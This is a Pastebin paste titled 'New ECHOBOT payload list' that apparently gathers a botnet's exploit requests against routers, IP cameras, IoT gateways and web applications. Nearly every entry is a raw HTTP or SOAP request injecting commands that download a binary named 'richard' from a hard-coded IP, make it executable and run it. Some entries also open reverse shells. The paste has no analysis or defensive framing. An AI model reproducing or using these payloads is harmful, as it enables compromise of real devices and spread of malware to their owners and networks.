API tools faq
paste
Advertisement
Guest User

New ECHOBOT payload list

a guest
Dec 12th, 2019
2,351
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.10 KB | None | 0 0
raw download clone embed print report
  1. POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.0
  2. Content-Length: 630
  3. Accept-Encoding: gzip, deflate
  4. Accept: /
  5. User-Agent: Hello-World
  6. Connection: keep-alive
  7.  
  8. POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  9.  
  10. GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  11.  
  12. GET /cgi-bin/script?wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  13.  
  14. GET /cgi-bin/test?iperf=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  15. Host: %s:80
  16.  
  17. GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&pingCNT=5 HTTP/1.0
  18. Host: 192.168.0.1:80
  19. Connection: keep-alive
  20. Pragma: no-cache
  21. Cache-Control: no-cache
  22. Upgrade-Insecure-Requests: 1
  23. Connection: keep-alive
  24. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  25. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  26. Referer: http://www.target.com/Main_Analysis_Content.asp
  27. Accept-Encoding: gzip, deflate
  28. Accept-Language: en-US,en;q=0.9
  29.  
  30. GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&pingCNT=5 HTTP/1.0
  31. Host: 192.168.1.1:80
  32. Proxy-Connection: keep-alive
  33. Authorization: Basic ZGVmYXVsdA==
  34. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  35. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
  36. Referer: http://192.168.1.1/Main_Analysis_Content.asp
  37. Accept-Encoding: gzip,deflate,sdch
  38. Accept-Language: en-US,en;q=0.8
  39.  
  40. POST /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.0
  41. Host: %s:8080
  42. "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
  43.  
  44. GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;').exit().%24a[ HTTP/1.0
  45. sort=].phpinfo().exit().$a[
  46. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  47. Connection: Close
  48.  
  49. GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;echo| HTTP/1.0
  50. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  51. Connection: Close
  52.  
  53. GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;echo|awstats HTTP/1.0
  54. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  55. Connection: Close
  56.  
  57. GET /cgi-bin/img.pl?f=etc/hosts&f=%Q!bin/sh -c echo 'YYY';wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; echo 'YYY'|! HTTP/1.0
  58.  
  59. GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  60. Host: %s:80
  61.  
  62. POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.0
  63. User-Agent: Hello-World
  64. Host: 192.168.0.1:5120
  65. Content-type: text/xml; charset=utf-8
  66. SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
  67. M-SEARCH * HTTP/1.1
  68. HOST: 239.255.255.250:1900
  69. MAN: ssdp:discover
  70. MX: 3
  71. ST: upnp:rootdevice
  72. <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
  73.  
  74. POST /upnp/control/basicevent1 HTTP/1.0
  75. Host: %s:49152
  76. Connection: keep-alive
  77. Accept-Encoding: gzip, deflate Accept: */*
  78. User-Agent: python-requests/2.18.4
  79. SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
  80. Content-Length: 393
  81. <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
  82.  
  83. GET /cgi-bin/operator/servetest?cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  84. Authorization: Basic YWRtaW46YWRtaW4=
  85. Server: Boa/0.94.14rc21
  86. Accept-Ranges: bytes
  87. Connection: close
  88. Content-type: text/plain
  89.  
  90. POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;Pa_Note HTTP/1.0
  91. Content-Type: application/x-www-form-urlencoded
  92.  
  93. GET /ccbill/whereami.cgi?g=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  94. Host: %s:80
  95.  
  96. POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  97. 'SSL_CLIENT_VERIFY' : 'SUCCESS'
  98. get_package_fil:
  99. site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
  100.  
  101. POST /web/cgi-bin/usbinteract.cgi?action=7&path="|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard|| HTTP/1.0
  102. Host: 192.168.0.1:9000
  103. Content-Length: 155
  104. Content-Type: application/x-www-form-urlencoded
  105.  
  106. POST /dogfood/mail/spell.php?data=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  107.  
  108. POST /apps/a3/cfg_ethping.cgi?MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%26 HTTP/1.0
  109.  
  110. POST /cgi-bin/;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  111.  
  112. POST /service/krashrpt.php?kuid=`id | wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard` HTTP/1.0
  113. Host: 192.168.0.1:80
  114. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
  115. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  116. Accept: /
  117. User-Agent: Hello-World
  118. Accept-Language: en-US,en;q=0.5
  119. Accept-Encoding: gzip, deflate
  120. Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
  121. Connection: close
  122. Upgrade-Insecure-Requests: 1
  123. Content-Type: application/x-www-form-urlencoded
  124. Content-Length: 37
  125.  
  126. POST /soap.cgi?service=WANIPConn1 HTTP/1.0
  127. Content-Length: 649
  128. Host: 10.8.28.133:49152
  129. Content-Type: text/xml
  130. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  131. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
  132.  
  133. GET /webadmin/script?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  134.  
  135. POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.0
  136. Host: %s:80
  137. {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://%s/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
  138.  
  139. GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard HTTP/1.0
  140.  
  141. GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard HTTP/1.0
  142.  
  143. POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard|ping%20-c%203%201.1.1.1|x HTTP/1.0
  144. Content-Length: 630
  145. Accept-Encoding: gzip, deflate
  146. Accept: /
  147. User-Agent: Hello-World
  148. Connection: keep-alive
  149.  
  150. GET /api/project/repo/log/graph/%60cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60 HTTP/1.0
  151.  
  152. POST /api/backup/logout.cgi?sid=aa;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  153. Content-type: text/html
  154.  
  155. GET /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  156.  
  157. POST /html/SetSmarcardSettings.php?HidChannelID=2&HidcmbBook=0&cmbBook=0|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
  158. HTTP/1.0
  159. Content-Length: 11660
  160. Content-Type: application/x-www-form-urlencoded
  161. Connection: close
  162. X-Powered-By: PHP/5.5.13
  163. User-Agent: joxypoxy/7.2.6
  164.  
  165. GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard aux&message= HTTP/1.0
  166. Host: 192.168.1.1:80
  167. Authorization: Basic YWRtaW46YWRtaW4=
  168.  
  169. GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%22%26 HTTP/1.0
  170.  
  171. GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  172.  
  173. POST /u/jsp/tools/exec.jsp?command=cmd+%2Fc+ping&argument=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%7C+whoami&async_output=ping1487856455258&isWindows=true HTTP/1.0
  174. Host: %s:8081
  175. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0
  176. Accept: */*
  177. Accept-Language: en-US,en;q=0.5
  178. Accept-Encoding: gzip, deflate
  179. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  180. X-Requested-With: XMLHttpRequest
  181. Referer: http://%s:8081/u/index.jsp
  182. Content-Length: 97
  183. Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
  184. Connection: close
  185. Pragma: no-cache
  186. Cache-Control: no-cache
  187.  
  188. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%27 HTTP/1.0
  189.  
  190. POST /global_data?Cookie:CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7; HTTP/1.0
  191. Host: %s:443
  192. Connection:close
  193.  
  194. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%27 HTTP/1.0
  195. Host: 192.168.0.1:50000
  196. Connection: keep-alive
  197. Cache-Control: max-age=0
  198. Upgrade-Insecure-Requests: 1
  199. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  200. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  201. Accept-Encoding: gzip, deflate
  202. Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  203. Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
  204.  
  205. GET /scripts/rpc.php?action=updatetime&timeserver=||wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  206.  
  207. GET /utility.cgi?testType=1&IP=aaa || wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  208. Host: %s:80
  209.  
  210. POST /op5config/welcome?do=do=Login&password=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  211. Connection: Close
  212.  
  213. GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  214.  
  215. GET /OvCgi/connectedNodes.ovpl?node=a|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  216.  
  217. POST /_async/AsyncResponseServiceHttps HTTP/1.0
  218. Accept-Encoding: gzip, deflate
  219. Accept: */*
  220. Accept-Language: en
  221. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  222. User-Agent: Hello-World
  223. Connection: close
  224. Content-Type: text/xml
  225. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
  226. <wsa:Action>xx</wsa:Action>
  227. <wsa:RelatesTo>xx</wsa:RelatesTo>
  228. </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
  229.  
  230. POST /moadmin/moadmin.php?object=1;system(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard);exit HTTP/1.0
  231. Host: 192.168.0.1:80
  232. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
  233. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  234. Accept-Language: en-US,en;q=0.5
  235. Accept-Encoding: gzip, deflate
  236. DNT: 1
  237. Connection: keep-alive
  238. Pragma: no-cache
  239. Cache-Control: no-cache
  240. Content-Type: application/x-www-form-urlencoded
  241. Content-Length: 34
  242.  
  243. GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  244.  
  245. POST /parse_xml.cgi?filename=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  246. Content-Length:
  247. Content-Type: application/x-www-form-urlencoded
  248.  
  249. POST /users/%2f/%2fproc%2fself%2fcomm?<%=`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard`%> HTTP/1.0
  250. Content-Type: multipart/form-data; boundary=
  251.  
  252. POST /wanipcn.xml HTTP/1.0
  253. Content-Length: 630
  254. Accept-Encoding: gzip, deflate
  255. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  256. Accept: /
  257. User-Agent: Hello-World
  258. Connection: keep-alive
  259. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  260.  
  261. GET /repository/annotate?rev=`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard` HTTP/1.0
  262. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  263. Connection: Close
  264.  
  265. POST /SGPAdmin/fileRequest?&invoker=&title=&params=&id=&cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&source=&query= HTTP/1.0
  266.  
  267. GET /goform/formSysCmd?sysCmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&apply=Apply&submit-url=/syscmd.asp&msg= HTTP/1.0
  268.  
  269. GET /index.php?plot=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  270. Host: %s:80
  271.  
  272. POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.0
  273.  
  274. GET /action.php?host:;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&PingCheck=Test HTTP/1.0
  275. Host: %s:80
  276.  
  277. GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60end HTTP/1.0
  278. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  279. Connection: Close
  280.  
  281. GET /qsrserver/device/getThumbnail?sourceUri=
  282. +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; > /tmp/f&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.0
  283.  
  284. GET /mnt_ping.cgi?isSubmit=1&addrType=3&pingAddr=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&send=Send HTTP/1.0
  285.  
  286. POST /page/maintenance/lanSettings/dns?dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60 HTTP/1.0
  287. Host: 192.168.0.1:80
  288. Content-Length: 64
  289. Accept: */*
  290. Origin: http://192.168.0.1
  291. X-Requested-With: XMLHttpRequest
  292. User-Agent: Testingus/1.0
  293. Content-Type: application/x-www-form-urlencoded
  294. Referer: http://192.168.0.1/maintenance
  295. Accept-Language: en-US,en;q=0.8,mk;q=0.6
  296. Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
  297. Connection: close
  298.  
  299. GET /VhttpdMgr?action=importFile&fileName=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  300. Host: %s:80
  301.  
  302. POST /smartdomuspad/modules/reporting/track_import_export.php?op=export&language=english&interval=1&object_id=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  303. Host: 192.168.0.1
  304. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
  305. Accept: /
  306. Accept-Language: en-US,en;q=0.5
  307. Accept-Encoding: gzip, deflate
  308. Connection: close
  309. Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
  310. Content-Type: application/x-www-form-urlencoded
  311. Content-Length: 86
  312.  
  313. POST /upnp/control/hag HTTP/1.0
  314. Host: %s:49451
  315. Accept: text/javascript, text/html, application/xml, text/xml, */*
  316. Accept-Language: en-us,en;q=0.5
  317. Accept-Encoding: gzip, deflate
  318. X-Requested-With: XMLHttpRequest
  319. X-Prototype-Version: 1.7
  320. Content-Type: text/xml;charset=UTF-8
  321. MIME-Version: 1.0
  322. Content-Length: 311
  323. Connection: keep-alive
  324. Pragma: no-cache
  325. SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
  326. <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)</Code> </u:RunLua></s:Body></s:Envelope>
  327.  
  328. POST /scripts/ajaxPortal.lua?destination=8.8.8.8$(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic&destination=8.8.8.8$(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic HTTP/1.0
  329. User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
  330. Accept: application/json, text/javascript, */*; q=0.01
  331. Accept-Language: en-US,en;q=0.5
  332. Accept-Encoding: gzip, deflate
  333. Referer: https://www.vmware.com
  334. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  335. X-Requested-With: XMLHttpRequest
  336. Cookie: culture=en-us
  337. Connection: close
  338.  
  339. POST /password_change.cgi?user=root&pam=&expired=2&old=AkkuS%7cwget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%20&new1=akkuss&new2=akkuss HTTP/1.0
  340. Host: %s:10000
  341. cookie:redirect=1; testing=1; sid=x; sessiontest=1
  342. Content-Type:application/x-www-form-urlencoded
  343.  
  344. POST /cgi-bin/rdfs.cgi?Client=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&Download=submit HTTP/1.0
  345. Host: 192.168.0.1:80
  346. application/x-www-form-urlencoded
  347. Content-Length: 1024
  348.  
  349. GET /cgi-bin/ccbill/whereami.cgi?g=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  350. Host: %s:80
  351.  
  352. GET /system.ini?loginuse&loginpas HTTP/1.0
  353.  
  354. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget http://145.249.106.241/richard; chmod +x richard; sh richard)&dir=/&mode=PORT&upload_interval=0 HTTP/1.0
  355.  
  356. GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s HTTP/1.0
  357.  
  358. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0 HTTP/1.0
  359.  
  360. POST /actionHandler/ajax_network_diagnostic_tools.php?test_connectivity=true&destination_address=www.comcast.net || wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; &count1=4 HTTP/1.0
  361. Host: 10.0.0.1:80
  362. User-Agent:
